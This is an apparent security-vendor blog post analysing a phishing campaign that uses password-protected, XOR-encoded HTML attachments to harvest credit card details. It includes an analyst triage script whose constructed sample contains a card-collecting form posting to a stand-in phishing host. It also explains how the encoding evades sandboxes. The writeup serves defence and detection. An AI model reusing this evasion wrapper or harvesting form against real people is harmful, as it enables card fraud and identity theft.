Recently, Proofpoint researchers have observed a number of email campaigns with attached password-protected malicious documents. These documents are primarily used to distribute malware including Cerber ransomware and the Ursnif banking Trojan, with document passwords included in the body of the email. The use of password-protected documents makes them difficult to execute in automated sandbox environments, circumventing a variety of anti-malware products. At the same time, including the password in the email makes it easy for recipients to open the document while password protection adds a sense of legitimacy.
Last week, however, we observed a phishing campaign using this technique designed to harvest credit card account numbers and personal information from account holders.
The email sample that we analyzed was personalized with the recipient’s name and what appear to be the starting digits of their credit card account number. The starting digits for credit cards are standardized, though, so this just adds to the apparent legitimacy of the carefully crafted emails without requiring actual knowledge of the recipient’s card number. The emails also use stolen branding and social engineering to create a sense of urgency, encouraging the recipient to update security information for their “new chip card” (Figure 1).
Figure 1: Personalized phishing email with HTML attachment
The email includes an HTML attachment that is protected by a password included in the email. The HTML attachment is also XOR-encoded, again making dynamic analysis more difficult. The encoded attachment is shown in Figure 2:
Figure 2: XOR-encoded HTML file attached to lure email (split for screen wrap)
Figure 4: Password prompt generated when the recipient opens the attached HTML file
If the user enters the password correctly, they will be presented with a fairly typical credit card phishing template, complete with stolen branding (redacted – Figure 5):
Figure 5: HTML phishing template after successful decoding (split for screen wrap)
The form will submit the credentials in the same manner as we see in typical credential phishing, via HTTP POST.
Figure 6: Code snippet from HTML file featuring POST method for submitting phished information
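The decode-then-POST flow described above, as an added analyst triage example (not Proofpoint's code and not the actual attachment): given the wrapper HTML and the password from the email body, it recovers the inner page and reports whether it contains a POST form collecting card fields. It assumes, since the post does not say, that the encoded page is stored as a hex string in a script variable and that the emailed password is the repeating XOR key; the sample attachment is constructed inline.

```python
"""Analyst triage for a password-protected, XOR-encoded HTML phishing attachment."""
import re
from html.parser import HTMLParser

# Assumptions, not stated on the page: the wrapper HTML stores the encoded page as a
# hex string in a script variable and uses the emailed password as a repeating XOR key.
BLOB_RE = re.compile(r'var\s+\w+\s*=\s*"([0-9a-fA-F]+)"')
CARD_HINTS = ("card", "cvv", "cvc", "exp", "pin", "ssn", "account")

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def decode_attachment(wrapper_html: str, password: str) -> str:
    """Pull the hex blob out of the wrapper and decode it with the emailed password."""
    match = BLOB_RE.search(wrapper_html)
    if not match:
        raise ValueError("no encoded blob found in attachment")
    raw = xor_bytes(bytes.fromhex(match.group(1)), password.encode())
    return raw.decode("utf-8", errors="replace")

class FormScanner(HTMLParser):
    """Collect POST form targets and input names from the decoded page."""
    def __init__(self):
        super().__init__()
        self.post_targets, self.fields = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and (a.get("method") or "get").lower() == "post":
            self.post_targets.append(a.get("action") or "")
        elif tag == "input" and a.get("name"):
            self.fields.append(a["name"].lower())

def triage(wrapper_html: str, password: str) -> dict:
    """Decode, then report the indicators of a card-harvesting form (POST + card fields)."""
    scanner = FormScanner()
    scanner.feed(decode_attachment(wrapper_html, password))
    card_fields = [f for f in scanner.fields if any(h in f for h in CARD_HINTS)]
    return {"post_targets": scanner.post_targets, "card_fields": card_fields,
            "likely_card_phish": bool(scanner.post_targets and card_fields)}

# Constructed sample (not the real lure): a minimal inner form wrapped as assumed above.
INNER = ('<form method="POST" action="http://phish.invalid/collect.php">'
         '<input name="cardnumber"><input name="cvv"><input name="expiry"></form>')
PASSWORD = "abc123"
SAMPLE_ATTACHMENT = ('<script>var data = "%s"; var key = prompt("Password from '
                     'your email");</script>'
                     % xor_bytes(INNER.encode(), PASSWORD.encode()).hex())
```

Run `triage(SAMPLE_ATTACHMENT, PASSWORD)` to see the recovered POST target and card fields; with the wrong password the blob decodes to noise and nothing is flagged.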
Credential and credit card phishing are nearly as old as cybercrime itself. This hasn’t stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password-protected document attachments to bypass anti-malware technologies and give recipients a false sense of security. The bottom line for end users, though, is that the appearance of legitimacy, even including personalization and convincing branding, does not equal safety online.